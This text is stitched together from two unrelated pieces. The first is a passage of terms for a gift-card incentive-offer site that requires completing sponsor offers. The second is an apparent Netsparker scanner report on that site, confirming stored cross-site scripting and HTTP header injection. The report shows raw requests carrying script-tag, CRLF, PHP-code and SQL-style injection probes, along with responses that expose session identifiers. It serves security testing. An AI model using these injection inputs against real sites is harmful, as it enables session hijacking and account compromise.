Access the registration form on the Site and enter and submit all requested information. Do not enter a P.O. Box for your mailing address. We will not ship any promotional item to a P.O. Box. You also may be offered the opportunity to answer a series of survey questions about your interests and/or request more information from our marketing partners. </li>
<br /><br />
<li><u><strong>Complete Sponsor Offers (and comply with the Cancellation Limitation)</strong></u><br />
For this promotion, $250 in McDonald's&reg; Arch Cards&trade;, you must complete a <i>total</i> of 24 offers as follows: <b>Page 1 (Silver) - complete any 8 offers; Page 2 (Gold) - complete any 8 offers; Page 3 (Platinum) - complete any 8 offers to get your gift.</b></p>


<p>To &ldquo;complete&rdquo; each Sponsor Offer, you must complete the exact number of Sponsor Offer Requirements as indicated on the Site, the Sponsor must report to us that you have successfully completed their offer (Sponsor notification typically takes 4 weeks), and you must not exceed the Cancellation Limitation set forth below.</p>
<p>
Examples of Sponsor Offers include, without limitation, trial offers, credit cards, product offers, service offers, other low-cost or commercial Offers, and Refer-a-Friend Offers. Some Offers require a purchase to be made, while others are free trials that convert to paying obligations if not canceled or free applications that do not require an initial purchase.</p>
<p>
You must complete the required number of Sponsor Offers within 60 days following the Program Sign-up Date, and all the steps in the Program Requirements (including the mailing-in of your Gift Redemption Voucher) must be completed within 180 days of your Program Sign-up Date. To remain eligible and qualify for program offers, you must use the same personal contact information that you provided during registration when making purchases.</p>
<p>
The number and category of Sponsor Offers available for you changes on a periodic basis as new Sponsors come in to the Site and older Sponsors expire. You should check back periodically after the Program Sign-up Date for new Sponsor Offer opportunities by visiting your &ldquo;Gift Status&rdquo; section under your &ldquo;Member Account&rdquo;.</p>
<p>
We rely on each Sponsor to provide us with timely reporting and confirmation of your successful completion of their Sponsor Offer. Sponsor offers may take 4 to 6 weeks to confirm successful completions. You must save all receipts, order confirmation, records and materials that show your transaction history with each Sponsor Offer. You may be asked for copies of receipts, order confirmations and other relevant documents in the Gift Redemption process to verify your transactions with Sponsors and failure to produce the required documents for a Sponsor Offer when requested may result in you not receiving completion credit for that Sponsor Offer. In addition, we reserve the right to request proof of identity such as a copy of your driver�s license, passport or other government issued identification.</p>

<p><strong>CANCELLATION LIMITATION: </strong>You will not be eligible to receive a Gift in this Promotion if, within 30 days of your Sponsor Offer Initial Transaction Date, you cancel your participation in more than two Sponsor Offers you have completed as a part of the Program Requirements. If you were invited by a Refer-a-Friend Offer, you can't cancel your participation in any Sponsor Offers within 30 days of your Sponsor Offer Initial Transaction Date (the &ldquo;<strong>Cancellation Limitation</strong>&rdquo;). </p>

<!--header:start-->
<!--header:end-->
<li><strong><u>Refer-a-Friend </u></strong><strong><u>Offers</u></strong> � If presented with Refer-a-Friend offers, you may choose to invite friend(s) who must complete the required number of Sponsor Offers as stated in the Refer-a-Friend email sent to your friend(s) which in turn will generate a Sponsor Offer completion towards your Gift. Refer-a-Friend Offers may require multiple friends to complete the required number of Sponsor Offers in order to generate a Sponsor Offer completion as stated on the Silver, Gold, and Platinum Refer-a-Friend Offer pages.
<p>Friends you refer must register using the link provided in the Refer-a-Friend email delivered to them. Please note the Refer-a-Friend email sent to friends must comply with <u>the CAN SPAM ACT of 2003</u>. Your friend�s name, address and email address must be different than yours, although your friend(s) may use an email address that is not the same as that initially provided by you.</p>
<p>Qualified Friends must: a.) abide by these Terms and Conditions when registering on this site; b.) register with a valid residential address; c.) have only been invited once by you from either the Silver, Gold, or Platinum Sponsor Offer pages; d.) not have previously generated Refer-a-Friend Offer completions for a friend on this web site; e.) satisfy the required number of Sponsor Offers, as shown on the Refer-a-Friend Offer pages and in the Refer-A-Friend email sent to your friend(s), within sixty (60) days of your registration date; and f.) not cancel participation in Sponsor Offers within 30 days of Friend(s) Sponsor Offer Initial Transaction Date(s). </p>
</li>
<li><strong><u>Gift Redemption</u></strong>- Check the �Gift Status� section of your Member Account information on the Site on a regular basis so that you�ll be able to see your progress as various Sponsors report back to us with your completion status. Before you receive a Gift Redemption Voucher the following must occur: a.) the required number of Sponsors must have reported to us that you successfully completed their offers, and b.) you have provided the required proofs of purchase. Upon satisfying a.) and b.) your account will be updated accordingly and you will receive a Gift Redemption Voucher to print, complete and mail for your Gift. Once you have sent your Gift Redemption Voucher, the Gift Status section of your Member Account will be updated. Be sure to keep a copy of your Gift Redemption Voucher. Upon our receipt of your properly completed Gift Redemption Voucher, it will take six (6) to eight (8) weeks to ship your Gift.
<p>
<strong>Note:</strong> We are solely responsible for the fulfillment of your Gift. All questions related to Gift fulfillment should be directed to us. Please do not contact our Sponsors regarding your Gift fulfillment status. The Sponsors are solely responsible for their Offers, Program Requirements, refunds, products, cancellations and related customer service. For those questions, please contact the Sponsors directly.</p>
</li>
<li><strong><u>License to Use this Site and Become a Member</u></strong>- Upon your agreement to this Agreement, the Company hereby grants you a non-exclusive, non-transferable limited license to use this site and participate in our programs in strict accordance with the terms and conditions in this Agreement and as permitted via instructions on this site. You acknowledge and agree that all content and services available on this site are property of the Company and its advertisers and licensors and are protected by copyrights, moral rights, trademarks, service marks, patents, trade secrets, and other proprietary rights and laws, in the U.S. and internationally. All rights not expressly granted herein are fully reserved by the Company, its advertisers and licensors.</li></ol>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">5. TERMINATION/CANCELLATION OF ACCOUNTS</font></b></p>
<!--header:end-->

<p>Company may, at its sole discretion, terminate any account and deny any Gift without prior notice for:</p>
<ul>
<li>any violation of any provision of these Terms and Conditions or fraudulent activity;</li>
<li>aiding, promoting, or participating in circumvention of the Program, including, but not limited to, using any account to accrue a Gift for a third party or using a third party's account to accrue a Gift for yourself, including without limitation posting informat..
Permanent Cross-site Scripting

Permanent Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1

Netsparker confirmed this vulnerability by analyzing the execution of injected JavaScript.

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.

Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Injection URL

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CB)%3C/script%3E&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265

Injection Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CB)%3C/script%3E&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Identification Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Injection Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:06:10 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830e28532b9fe;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


Identification Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:06:11 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830e3a7adfyxa;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=<?&SID=f05c7ce946bc38d8bfa6b839a4d56265 print(int)0xFFF9999-22;//?>&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=<?&SID=f05c7ce946bc38d8bfa6b839a4d56265 print(int)0xFFF9999-22;//?>&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&gift=29617#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&gift=29617" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&gift=29617" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



HTTP Header Injection

HTTP Header Injection

9 TOTAL
MEDIUM
A CRLF (New line) injection in HTTP headers was identified. This means that the input goes into HTTP headers without proper input filtering.

Impact

Depending on the application. An attacker might carry out the following forms of attacks:

Actions to Take

  1. See the remedy for solution.
  2. Ensure the server security patches are up to date and that the current stable version of the software is in use.

Remedy

Do not allow newline characters in input. Where possible use strict white listing.

Required Skills for Successful Exploitation

Crafting the attack to exploit this issue is not a complex process. However most of the unsophisticated attackers will not know that such an attack is possible. Also an attacker needs to reach his victim by an e-mail or other similar method in order to entice them to visit the site or click upon a URL.

External References

- /ups.htm

/ups.htm

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=296..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET http://example.com/? ns: netsparker056650=vuln
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: promo_name_cookie=; c_user_pin_id=200492244; c_pin_key=&expr 268409241 - 2 &; c_email_key=d41d8cd98f00b204e9800998ecf8427e; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916060; scook=1303916060; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:54:35 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82e2b4c0dbbhr;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=http://example.com/?,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
ns: netsparker056650=vuln;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
